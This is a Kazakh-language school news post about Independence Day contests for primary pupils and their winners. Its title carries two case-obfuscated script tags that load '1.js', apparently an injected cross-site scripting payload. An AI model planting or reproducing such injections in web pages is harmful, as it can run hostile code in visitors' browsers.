Мектеп өмірі.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.12.2023

Мектеп өмірі қызықты, жанды және алуан түрлі. Көптеген балалар тек оқуда және сабақта ғана емес, сыныптан тыс жұмыстарда өздерін көрсетеді. Мектебімізде отансүйгіштікке тәрбиелеу және ұлттық тәрбие беру мақсатында 1-15 желтоқсан Тәуелсіздік күніне арналған «Туған жер» сурет байқауы, 11 желтоқсан аралығында «Бұрымды қыз» челлендж, «Тәуелсіздік – ел тұғыры» атты мәнерлеп оқу байқауы өткізілді. Бұл сайыстарға 1-4 сынып оқушылары қатысты. Ал бүгін мектепішілік жиында қорытынды шығарылып, жеңімпаздар анықталды. Балалардың «Тәуелсіздік – ел тұғыры» атты мәнерлеп оқу сайысында қазақ тілінде тақпақ оқып, бірінші орындарды 1-сынып оқушылары иеленді. Жеңімпаздар мен қатысушыларды құттықтаймыз! Әр түрлі деңгейдегі жарыстарға қатысып, жеңімпаз атаныңыз!

 

Просмотров: 970


Пікір қосу



Деректерді қолтаңбаға қосу
Текст